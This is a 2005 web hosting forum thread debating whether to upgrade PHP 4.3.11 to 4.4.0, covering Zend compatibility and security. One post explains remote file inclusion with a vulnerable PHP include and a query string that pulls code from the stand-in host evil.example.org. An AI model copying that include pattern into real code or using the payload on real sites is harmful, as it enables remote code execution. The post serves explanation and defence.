Results 1 to 25 of 31
Thread: php4.3.11 is very old?
-
07-19-2005, 03:33 PM #1Web Hosting Master
- Join Date
- Jul 2002
- Posts
- 3,374
php4.3.11 is very old?
got a question from user that he have been told that php version on my server is very old... uh...php 4.4.0 just come out and from the feedback, it's not worth to upgrade to php 4.4.0 and most web apps doesn't support php5.
why do people want latest that is not stable or widely supported.
-
07-19-2005, 03:44 PM #2WHT Addict
- Join Date
- Oct 2003
- Location
- Israel
- Posts
- 133
PHP 4.4.0 is pretty much like 4.3.11, it's simple a small security release. I would advise you to upgrade.
- TomerChristmas time is among us, get your loved ones Designer Fragrances
-
07-19-2005, 04:22 PM #3Newbie
- Join Date
- Apr 2004
- Posts
- 9
I'd have to agree, I had some exploits discovered with older versions that caused me some problems.
Regards,
Aaron
-
07-19-2005, 05:11 PM #4Web Hosting Master
- Join Date
- Jul 2002
- Posts
- 3,374
Originally posted by Tomer
PHP 4.4.0 is pretty much like 4.3.11, it's simple a small security release. I would advise you to upgrade.
- Tomer
-
07-19-2005, 05:34 PM #5Web Hosting Master
- Join Date
- Jan 2005
- Location
- Minneapolis, MN
- Posts
- 966
Originally posted by jt2377
what kind of security risk? does it really make a difference?
There is also the changelog: http://www.php.net/ChangeLog-4.php#4.4.0Doyle Lewis
BuyHTTP Internet Services - In business since 2003
Business Hosting | nginx, CloudLinux, Varnish cache, and CDP with every business account
Shared, Reseller, Semi Dedicated, VPS, Cloud, Dedicated - We can grow with you
-
07-19-2005, 07:04 PM #6Retired Moderator
- Join Date
- Mar 2004
- Location
- Singapore
- Posts
- 6,990
I heard that Zend has a problem with PHP 4.4 upgrade, anyone facing such problems?
-
07-19-2005, 08:32 PM #7Web Hosting Master
- Join Date
- Jul 2002
- Posts
- 3,374
Originally posted by boonchuan
I heard that Zend has a problem with PHP 4.4 upgrade, anyone facing such problems?
-
07-20-2005, 12:47 AM #8Junior Guru
- Join Date
- Aug 2003
- Location
- Kansas City, MO
- Posts
- 195
We upgraded one server to PHP 4.4.0 and it caused problems with Zend.
NameHero® - Fast Web Hosting & Domains Made Easy
+40,000 web hosting and domain customers
Awarded Inc. 5000’s fastest growing private companies in America in 2022 and 2023
-
07-20-2005, 12:52 AM #9Newbie
- Join Date
- Jul 2005
- Posts
- 27
Uhh ya I had problems with Zend to but I did over time get it fixed. Anyways its not worth upgrading if you ask me.
-
07-22-2005, 01:08 PM #10Junior Guru Wannabe
- Join Date
- Mar 2005
- Posts
- 75
We upgraded one server to PHP 4.4.0 and it caused problems with Zend.
-
07-23-2005, 12:10 PM #11Junior Guru Wannabe
- Join Date
- Jul 2005
- Location
- Chicago
- Posts
- 34
We went from PHP 4.3.10 to PHP 4.3.11 and no more plans to upgrade PHP; will give PHP team more time to update/patch it
ASBHost.com - We host your business.
Serious People, Professional Services.
FortiGate Hardware Firewall, DDoS monitoring, Multilingual Support, E-Commerce ready, cPanel/WHM.
-
07-23-2005, 01:05 PM #12Web Hosting Master
- Join Date
- Jun 2003
- Location
- United States of America
- Posts
- 1,847
all these kinds of upgrades make me sick at somedays especially when you do it on a production server i usually just build a new vserver to see what happens
Computer Steroids - Full service website development solutions since 2001.
(612)234-2768 - Locally owned and operated in the Minneapolis, Minnesota area.
-
07-24-2005, 03:46 AM #13Disabled
- Join Date
- Jul 2005
- Posts
- 269
If you upgarde to 4.4.0 make sure you upgarde zend to 2.5.10 and latest version of Ioncube
-
07-26-2005, 08:07 AM #14Disabled
- Join Date
- Aug 2004
- Location
- Zurich, Switzerland
- Posts
- 774
Upgraded to PHP 4.4.0 a week ago together with Zend optimizer 2.5.10a and have yet to see any probs with any of the websites on the server.
-
07-26-2005, 06:54 PM #15Web Hosting Guru
- Join Date
- Mar 2003
- Location
- Spokane, WA
- Posts
- 262
Perhaps your customer is thinking that PHP 5 has been fully released. I've met a couple of people under that impression.
-
07-26-2005, 07:06 PM #16Disabled
- Join Date
- Aug 2004
- Location
- Zurich, Switzerland
- Posts
- 774
Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).
-
07-26-2005, 07:10 PM #17Web Hosting Guru
- Join Date
- Mar 2003
- Location
- Spokane, WA
- Posts
- 262
Excuse me, my bad. PHP 5.1 is what is in beta. Don't mind me, nothing to see here.
-
07-28-2005, 03:55 AM #18Web Hosting Master
- Join Date
- Jan 2004
- Location
- Singapore
- Posts
- 1,032
Unless there is a serious exploit, there is little reason to do so. Because exploits are always there even with the new versions, just that the developers are not aware of it yet.
My own upgrading process was at 4.3.4 then to 4.3.8 but when there was a serious problem with it, I moved to 4.3.10 and 4.3.11
Some people just want the provider to spend extra resources to suit their little pecky needs of seeing the newest version number on their screens with little to no knowledge of what goes on at all....
My 2 Cents.
"If its not broken why fix it?"-=- GQ Hong -=-
GalacNet WebMaster
-
07-28-2005, 06:00 AM #19Disabled
- Join Date
- Aug 2004
- Location
- Zurich, Switzerland
- Posts
- 774
Since php.net says for every such security/bugfix release that everyone should update ASAP, it doesn't sound to me like a "customer's whim". For me it's rather the opposite, IMO my customers have every right to accept me to keep crucial system components up to date. Some of the big exploits in scripts like phpBB were PHP version dependent, i.e. when one had the latest PHP version at the point of the exploit, the server was safe from it.
At any rate, on Windows I'm also for the "if it ain't broken, don't fix it" strategy because it's really true, just had to restore a Windows 2003 Server last week because one of the latest small security patches from Windows Update broke just about everything, the computer wasn't working right any more. OTOH on GNU/Linux this is rather unlikely to happen, with commercial addons like cPanel/WHM it happens now and then, but with the core system it's a very rare thing. Years ago when I was mainly using Windows I never patched anything that worked, but after years of having administered GNU/Linux webservers and using Mac OS X at home, I got into the habit of always keeping things on the latest.
-
07-28-2005, 07:37 AM #20Web Hosting Master
- Join Date
- Jul 2002
- Posts
- 3,374
Originally posted by RambOrc
Actually PHP 5 has been released for public use long ago, it's just a discouraging picture of how many apps still don't run on it. AFAIK Apache 2 is still not officially recommended for production sites, but PHP 5 is (correct me if I'm wrong).
in this case 4.4.0 only fix some minor bugs that won't pose much of the threat to the server.Last edited by jt2377; 07-28-2005 at 07:40 AM.
-
07-28-2005, 07:54 AM #21Disabled
- Join Date
- Aug 2004
- Location
- Zurich, Switzerland
- Posts
- 774
The "it ain't broken" proverb means to me rather that even though Fedora Core 4 is out, I leave a Fedora Core 2 server the way it is, updating it neither to C3 nor to C4. But for me it doesn't mean leaving things unpatched within C2. Same with PHP, 4.4.0 "addresses a serious memory corruption problem" and that's not to be taken lightly IMO.
-
07-28-2005, 10:56 AM #22Junior Guru Wannabe
- Join Date
- Jan 2005
- Posts
- 46
I understand that for a web hosting company security is always a really important point but sometimes certain upgrades are not really worth.
IMHO you should be fine with PHP 4.3.11 bearing in mind you do not allow certain directives on your servers.
-
07-28-2005, 11:38 AM #23Junior Guru Wannabe
- Join Date
- Jul 2005
- Location
- Chicago
- Posts
- 34
Originally posted by hardwarefanatic
IMHO you should be fine with PHP 4.3.11 bearing in mind you do not allow certain directives on your servers.ASBHost.com - We host your business.
Serious People, Professional Services.
FortiGate Hardware Firewall, DDoS monitoring, Multilingual Support, E-Commerce ready, cPanel/WHM.
-
07-28-2005, 03:22 PM #24Junior Guru Wannabe
- Join Date
- Jan 2005
- Posts
- 46
Originally posted by asbhost
What kind of directives are we talking here about? Share with us so that everbody knows.
Just to give you an example:
Imagine you have this script on your site
<?php
include "$path/script.php";
?>
With register_globals enabled , this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:
<?php
include 'http://evil.example.org/?/script.php';
?>
If allow_url_fopen is enabled (which it is by default), this will include the output of http://evil.example.org/ just as if it were a local file. This is a major security vulnerability, and it is has been used many times.
This is just a basic example of what you need to modify bearing in mind the vulnerabilities discovered. If you get a way of doing this you shouldn't bother to upgrade. Most of the times there's another way round.
-
07-28-2005, 03:34 PM #25Disabled
- Join Date
- Aug 2004
- Location
- Zurich, Switzerland
- Posts
- 774
In the above example, if register_globals is off, does it matter whether allow_url_fopen is on or off?